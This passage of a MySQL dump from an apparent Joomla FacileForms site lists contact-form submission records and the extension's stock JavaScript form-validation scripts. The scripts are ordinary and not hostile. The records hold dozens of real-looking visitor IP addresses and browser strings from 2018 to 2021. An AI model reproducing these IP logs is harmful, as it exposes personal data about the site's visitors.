00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(30,'2018-11-14 22:03:09',2,'Contactnew','Contactnew','5.3.193.165','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.71','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(31,'2018-11-15 23:01:37',2,'Contactnew','Contactnew','5.166.199.142','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(32,'2018-11-17 02:10:09',2,'Contactnew','Contactnew','95.79.4.87','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.44','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(33,'2018-11-21 06:55:02',2,'Contactnew','Contactnew','106.199.18.143','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(34,'2018-11-28 07:31:27',2,'Contactnew','Contactnew','165.255.100.73','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(35,'2018-12-24 11:51:50',2,'Contactnew','Contactnew','45.249.80.123','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(36,'2019-02-28 14:40:28',2,'Contactnew','Contactnew','103.193.91.180','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(37,'2020-02-19 13:30:59',2,'Contactnew','Contactnew','196.32.254.70','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(38,'2020-03-19 12:35:00',2,'Contactnew','Contactnew','84.17.61.9','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.106','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(39,'2020-04-23 15:03:28',2,'Contactnew','Contactnew','165.73.20.117','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(40,'2020-04-24 08:23:42',2,'Contactnew','Contactnew','165.255.121.154','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(41,'2020-04-28 14:42:22',2,'Contactnew','Contactnew','23.254.224.54','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(42,'2020-07-15 10:51:47',2,'Contactnew','Contactnew','196.30.66.121','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(43,'2020-07-15 22:51:20',2,'Contactnew','Contactnew','105.226.5.86','Mozilla/5.0 (Linux; Android 9; SNE-LX2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36','unix','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(44,'2020-08-04 10:19:13',2,'Contactnew','Contactnew','37.111.232.11','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(45,'2020-08-05 23:31:25',2,'Contactnew','Contactnew','23.254.224.54','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(46,'2020-09-26 08:07:34',2,'Contactnew','Contactnew','89.187.168.169','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(47,'2020-10-21 17:12:32',2,'Contactnew','Contactnew','102.65.57.125','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36 Edg/86.0.622.43','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(48,'2020-12-17 18:52:45',2,'Contactnew','Contactnew','107.175.58.115','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(49,'2021-01-20 10:08:32',2,'Contactnew','Contactnew','196.34.129.233','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(50,'2021-01-30 01:57:17',2,'Contactnew','Contactnew','51.75.146.127','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(51,'2021-02-26 12:49:33',2,'Contactnew','Contactnew','192.227.182.137','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(52,'2021-03-02 14:32:20',2,'Contactnew','Contactnew','185.255.96.99','Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(53,'2021-03-02 21:45:04',2,'Contactnew','Contactnew','185.189.114.117','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(54,'2021-03-03 08:16:32',2,'Contactnew','Contactnew','169.0.100.84','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15','mac','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(55,'2021-03-10 22:50:39',2,'Contactnew','Contactnew','31.171.152.140','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(56,'2021-04-03 05:42:41',2,'Contactnew','Contactnew','103.112.0.215','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(57,'2021-04-12 13:23:36',2,'Contactnew','Contactnew','31.171.152.140','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(58,'2021-04-14 04:13:28',2,'Contactnew','Contactnew','103.212.145.25','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(59,'2021-04-14 19:27:33',2,'Contactnew','Contactnew','196.19.240.14','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(60,'2021-05-03 05:18:22',2,'Contactnew','Contactnew','196.196.31.134','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(61,'2021-05-12 13:44:56',2,'Contactnew','Contactnew','192.3.244.126','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(62,'2021-05-31 12:52:56',2,'Contactnew','Contactnew','84.247.48.60','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(63,'2021-06-10 21:45:38',2,'Contactnew','Contactnew','186.179.33.214','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(64,'2021-06-11 07:18:38',2,'Contactnew','Contactnew','131.108.16.90','Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(65,'2021-06-17 08:03:20',2,'Contactnew','Contactnew','185.255.96.99','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(66,'2021-06-22 17:03:02',2,'Contactnew','Contactnew','157.37.175.162','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(67,'2021-06-26 21:30:20',2,'Contactnew','Contactnew','195.246.120.169','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(69,'2021-07-05 06:49:45',2,'Contactnew','Contactnew','188.235.215.140','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','win','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(70,'2021-07-07 08:26:38',2,'Contactnew','Contactnew','92.255.198.132','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(71,'2021-07-08 08:53:51',2,'Contactnew','Contactnew','188.122.82.146','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.39','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00',''),(72,'2021-07-08 17:41:59',2,'Contactnew','Contactnew','156.146.50.89','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','win','Unknown',1,0,0,0,'-','-','','0000-00-00 00:00:00',0,0,0,'','0000-00-00 00:00:00','');
/*!40000 ALTER TABLE `vzx9b_facileforms_records` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_scripts`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_scripts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_scripts` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`published` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`name` varchar(30) NOT NULL DEFAULT '',
`title` varchar(50) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`type` varchar(30) NOT NULL DEFAULT '',
`code` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=45 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_scripts`
--
LOCK TABLES `vzx9b_facileforms_scripts` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_scripts` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_scripts` VALUES (1,1,'FF','ff_anychecked','Any Checked','Validate that any radio button or checkbox of a group is checked.','Element Validation','function ff_anychecked(element, message)\r\n{\r\n // get plain name\r\n // alert(document.ff_form52[\'ff_nm_bfQuickMode6303958[]\']);\r\n // alert(document.getElementById(element.id).id);\r\n var name = \'\';\r\n if(!element.name){\r\n if(element.length && element.length != 0){\r\n name = element[0].name;\r\n var cnt = 0;\r\n for (var i = 0; i < element.length; i++)\r\n if (element[i].name==name) \r\n if (element[i].checked) cnt++; \r\n if (cnt==0) {\r\n ff_validationFocus(element[0].name);\r\n if (message==\'\') message = \"Please check or select \"+name+\".\\n\";\r\n return message;\r\n } // if \r\n\r\n } else {\r\n return \'\';\r\n }\r\n } else {\r\n name = element.name;\r\n if (name.substr(0,6) == \'ff_nm_\') name = name.substring(6,name.length-2);\r\n\r\n // loop through elements and count selections\r\n var cnt = 0;\r\n for (var i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) \r\n if (ff_getElementByIndex(i).checked) cnt++;\r\n\r\n // if none selected, emitt error\r\n if (cnt==0) {\r\n ff_validationFocus(element.name);\r\n if (message==\'\') message = \"Please check or select \"+name+\".\\n\";\r\n return message;\r\n } // if\r\n }\r\n \r\n return \'\';\r\n} // ff_anychecked'),(2,1,'FF','ff_checked','Checked','Validate that radio button or checkbox is checked.','Element Validation','function ff_checked(element, message)\r\n{\r\n if (element.checked) \r\n return \'\'; \r\n else {\r\n if (message==\'\') message = element.name+\" is not checked.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } \r\n}'),(3,1,'FF','ff_checkedValue','Get checked value','Get value of the currently checked radiobutton.','Untyped','function ff_checkedValue(name)\r\n{\r\n // loop through elements and find checked\r\n for (i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) {\r\n e = ff_getElementByIndex(i);\r\n if (e.checked) return e.value;\r\n } // if \r\n return \'\';\r\n} // ff_checkedValue'),(4,1,'FF','ff_countQuerySelections','Count Query Selections','Counts how many checkboxes/radiobuttons are checked/selected in a query list element','Untyped','function ff_countQuerySelections(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var cnt = ff_queryRows[id].length;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr;\r\n var sels = 0;\r\n for (curr = 0; curr < cnt; curr++)\r\n if (document.getElementById(\'ff_cb\'+id+\'_\'+curr).checked) sels++;\r\n return sels;\r\n} // ff_countQuerySelections'),(5,1,'FF','ff_dollaramount2dp','Dollar Amount with 2 Decimal Places','Validate that a dollar amount with two decimal places is entered.','Element Validation','function ff_dollaramount2dp(element, message)\r\n{\r\n var ex = /^\\d+$|^\\d+\\.\\d{2}$/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number with two decimal places.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_dollaramount2dp'),(6,1,'FF','ff_expString','String export','Export string function: escapes special characters of a string','Untyped','function ff_expString(text)\r\n{\r\n text = trim(text);\r\n var i;\r\n var o = \'\';\r\n for(i = 0; i < text.length; i++) {\r\n c = text.charAt(i);\r\n switch(c) {\r\n case \';\' : o += \'\\\\x3B\'; break;\r\n case \',\' : o += \'\\\\x2C\'; break;\r\n case \'&\' : o += \'\\\\x26\'; break;\r\n case \'<\' : o += \'\\\\x3C\'; break;\r\n case \'>\' : o += \'\\\\x3E\'; break;\r\n case \'\\\'\': o += \'\\\\x27\'; break;\r\n case \'\\\\\': o += \'\\\\x5C\'; break;\r\n case \'\"\' : o += \'\\\\x22\'; break;\r\n case \'\\n\': o += \'\\\\n\'; break;\r\n case \'\\r\': o += \'\\\\r\'; break;\r\n default: o += c;\r\n } // switch\r\n } // for\r\n return o;\r\n} // expString'),(7,1,'FF','ff_flashupload_not_empty','Flash Upload Not Empty (QuickMode only!)','Validates if a flash upload is empty or not.','Element Validation','function ff_flashupload_not_empty(element, message)\r\n{\r\n if(typeof bfSummarizers == \"undefined\") { alert(\"Flash upload validation only available in QuickMode!\"); return \'\'}\r\n if(JQuery(\'#bfFlashFileQueue\'+element.id.split(\'ff_elem\')[1]).html() != \'\') return \'\';\r\n if (message==\'\') message = \"Please enter \"+element.name+\".\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n} // ff_valuenotempty'),(8,1,'FF','ff_getfocus','Get focus','Get the focus. Usually this is for the first element of the form/page.','Element Init','function ff_getfocus(element,condition)\r\n{\r\n if(!element.name){\r\n if(element.length && element.length != 0){\r\n element[0].focus();\r\n }\r\n }else{\r\n element.focus();\r\n }\r\n}'),(9,1,'FF','ff_getQuerySelectedRows','Get Query Selected Rows','Returns the selected rows in a 2-dimensional array','Untyped','function ff_getQuerySelectedRows(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var rcnt = ff_queryRows[id].length;\r\n var cnt = rcnt;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr, r;\r\n var selcnt = 0;\r\n var sels = new Array;\r\n for (curr = 0; curr < cnt; curr++) {\r\n var elem = document.getElementById(\'ff_cb\'+id+\'_\'+curr);\r\n if (elem.checked) {\r\n var ident = elem.value;\r\n for (r = 0; r < rcnt; r++)\r\n if (ff_queryRows[id][r][0] == ident) {\r\n sels[selcnt++] = ff_queryRows[id][r];\r\n break;\r\n } // if\r\n } // if\r\n } // for\r\n return sels;\r\n} // ff_getQuerySelectedRows'),(10,1,'FF','ff_getQuerySelections','Get Query Selected ID\'s','Returns the column values of the checked/selected checkboxes/radiobuttons in an array','Untyped','function ff_getQuerySelections(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var cnt = ff_queryRows[id].length;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr;\r\n var selcnt = 0;\r\n var sels = new Array;\r\n for (curr = 0; curr < cnt; curr++) {\r\n var elem = document.getElementById(\'ff_cb\'+id+\'_\'+curr);\r\n if (elem.checked) \r\n sels[selcnt++] = elem.value;\r\n } // for\r\n return sels;\r\n} // ff_getQuerySelections'),(11,1,'FF','ff_htmlvaluenotempty','HTML Texteditor Not Empty','Checks if an HTML editor element is empty or not','Element Validation','function ff_htmlvaluenotempty( element, message ){\r\n \r\n if( typeof bf_htmltextareanames == \"undefined\" ) return \'\';\r\n\r\n var content = \"\";\r\n\r\n for(var i = 0; i < bf_htmltextareanames.length; i++){\r\n if( element.name == bf_htmltextareanames[i] ) {\r\n eval(\"content = \" + bf_htmltextareas[i]);\r\n break;\r\n }\r\n }\r\n if (JQuery.trim(content) == \"\") {\r\n if (message==\'\') message = element.name+\" must not be empty.\\n\";\r\n return message;\r\n } // if\r\n return \'\';\r\n}'),(12,1,'FF','ff_impString','String import','Import string function: unescapes c-coded characters of a string','Untyped','function ff_impString(text)\r\n{\r\n var str = \'\';\r\n var ss = 0;\r\n var s;\r\n var tl = text.length;\r\n var hexdigs = \"0123456789abcdefABCDEF\";\r\n while (ss < tl) {\r\n s = text.charAt(ss++);\r\n if (s == \'\\\\\') {\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n switch (s) {\r\n case 0 : break;\r\n case \'e\' : str += \'\\33\'; break;\r\n case \'t\' : str += \'\\t\'; break;\r\n case \'r\' : str += \'\\r\'; break;\r\n case \'n\' : str += \'\\n\'; break;\r\n case \'f\' : str += \'\\f\'; break;\r\n case \'x\' : {\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n var ch = \'\';\r\n while (hexdigs.indexOf(s)>=0 && ch.length < 2) {\r\n ch += s;\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n } // while\r\n while (ch.length < 2) ch = \'0\'+ch;\r\n str += unescape(\'%\'+ch);\r\n if (s) ss--;\r\n break;\r\n }\r\n default:\r\n str += s;\r\n } // switch\r\n } else\r\n str += s;\r\n } // while\r\n return str;\r\n} // impString'),(13,1,'FF','ff_integer','Integer Number','Validate that an integer value is entered.','Element Validation','function ff_integer(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_integer'),(14,1,'FF','ff_integeramount','Positive Integer','Validate that an positive integer value is entered.','Element Validation','function ff_integeramount(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_integeramount'),(15,1,'FF','ff_integer_or_empty','Integer or empty','Validate that either an integer value or nothing is entered.','Element Validation','function ff_integer_or_empty(element, message)\r\n{\r\n if (element.value != \'\') {\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be integer.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n } // if\r\n return \'\';\r\n} // ff_integer_or_empty'),(16,1,'FF','ff_nextpage','Next page','Switchs to the next page.','Element Action','function ff_nextpage(element, action)\r\n{\r\n if (ff_currentpage < ff_lastpage) {\r\n ff_switchpage(ff_currentpage+1);\r\n self.scrollTo(0,0);\r\n }\r\n} // ff_nextpage'),(17,1,'FF','ff_page1','Page 1','Switches to the first page.','Element Action','function ff_page1(element, action)\r\n{\r\n ff_switchpage(1);\r\n} // ff_page1'),(18,1,'FF','ff_page2','Page 2','Switches to the second page.','Element Action','function ff_page2(element, action)\r\n{\r\n if (ff_lastpage >= 2) ff_switchpage(2);\r\n} // ff_page2'),(19,1,'FF','ff_page3','Page 3','Switches to the third page.','Element Action','function ff_page3(element, action)\r\n{\r\n if (ff_lastpage >= 3) ff_switchpage(3);\r\n} // ff_page3'),(20,1,'FF','ff_previouspage','Previous page','Switches to the previous page.','Element Action','function ff_previouspage(element, action)\r\n{\r\n if (ff_currentpage > 1){\r\n ff_switchpage(ff_currentpage-1);\r\n self.scrollTo(0,0);\r\n }\r\n} // ff_previouspage'),(21,1,'FF','ff_real','Real Number','Validate that a real number is entered.','Element Validation','function ff_real(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*\\.?\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_real'),(22,1,'FF','ff_realamount','Positive Real Number','Validate that a positive real number is entered.','Element Validation','function ff_realamount(element, message)\r\n{\r\n var ex = /(^\\d\\d*\\.?\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_realamount'),(23,1,'FF','ff_resetForm','Reset form','Reset all form inputs to the initial values.','Element Action','function ff_resetForm(element, action)\r\n{\r\n eval(\'document.\'+ff_processor.form_id).reset();\r\n} // ff_resetForm'),(24,1,'FF','ff_securitycode_entered','Security code entered','Check that a security code was entered.','Element Validation','function ff_securitycode_entered(element, message)\r\n{\r\n var ex = /(^\\d{5}$)/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = \"Security code must be entered as five digits.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_securitycode_entered'),(25,1,'FF','ff_securitycode_ok','Security code ok','Check that a valid security code was entered.','Element Validation','function ff_securitycode_ok(element, message)\r\n{\r\n<?php\r\n global $ff_seccode;\r\n if (!isset($ff_seccode)) { \r\n mt_srand((double)microtime()*1000000);\r\n $ff_seccode = mt_rand(10000, 99999);\r\n JFactory::getSession()->set(\'ff_seccode\', $ff_seccode);\r\n } // if\r\n $enc = array();\r\n mt_srand((double)microtime()*1000000);\r\n for ($i = 0; $i < 256; $i++) $enc[] = mt_rand(0, 255);\r\n $seccode = (string)$ff_seccode;\r\n $hash = \'\';\r\n $ini = $ff_seccode % 240;\r\n for ($i = 0; $i < 5; $i++) {\r\n $d = $ini+intval($seccode{$i});\r\n for ($j = 0; $j < 7; $j++) $d = $enc[$d];\r\n $hash .= $d;\r\n $ini = ($ini+$d) % 240;\r\n } // for\r\n return\r\n \"var enc = \".$this->expJsValue($enc).\";\\n\".\r\n \"var seccode = new String(element.value);\\n\".\r\n \"if (seccode.length==5) {\\n\".\r\n \" var hash = \'\';\\n\".\r\n \" var ini = parseInt(element.value) % 240;\\n\".\r\n \" var i, j;\\n\".\r\n \" for (i = 0; i < 5; i++) {\\n\".\r\n \" var d = ini+parseInt(seccode.charAt(i));\\n\".\r\n \" for (j = 0; j < 7; j++) d = enc[d];\\n\".\r\n \" hash += d;\\n\".\r\n \" ini = (ini+d) % 240;\\n\".\r\n \" } // for\\n\".\r\n \" if (hash == \'$hash\') return \'\';\\n\". \r\n \"} // if\\n\".\r\n \"if (message==\'\') message = \\\"Security code is missing or wrong.\\\\n\\\";\\n\".\r\n \"ff_validationFocus(element.name);\\n\".\r\n \"return message;\\n\";\r\n?>\r\n} // ff_securitycode_ok'),(26,1,'FF','ff_selectedValues','Get selected values as list','Get values of selected options of a select list as list:\r\n\r\nx = ff_selectedValues(\'myselectlist\');\r\n// x = green,red','Untyped','function ff_selectedValues(name)\r\n{\r\n vals = \'\';\r\n opts = ff_getElementByName(name).options;\r\n for (o = 0; o < opts.length; o++)\r\n if (opts[o].selected) {\r\n if (vals != \'\') vals += \',\';\r\n vals += opts[o].value;\r\n } // if\r\n return vals;\r\n} // ff_selectedValues'),(27,1,'FF','ff_setChecked','Set radiobutton checked','Set a radiobutton checked/unchecked','Untyped','function ff_setChecked(name, value, checked)\r\n{\r\n if (arguments.length<3) checked = true;\r\n for (var i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) {\r\n var e = ff_getElementByIndex(i);\r\n if (e.value == value) {\r\n e.checked = checked;\r\n break;\r\n } // if\r\n } // if\r\n} // ff_setChecked'),(28,1,'FF','ff_setSelected','Select options of select list','Select options in a Select List element.\r\n\r\nff_setSelected(\'mylist\', \'green\'); // select 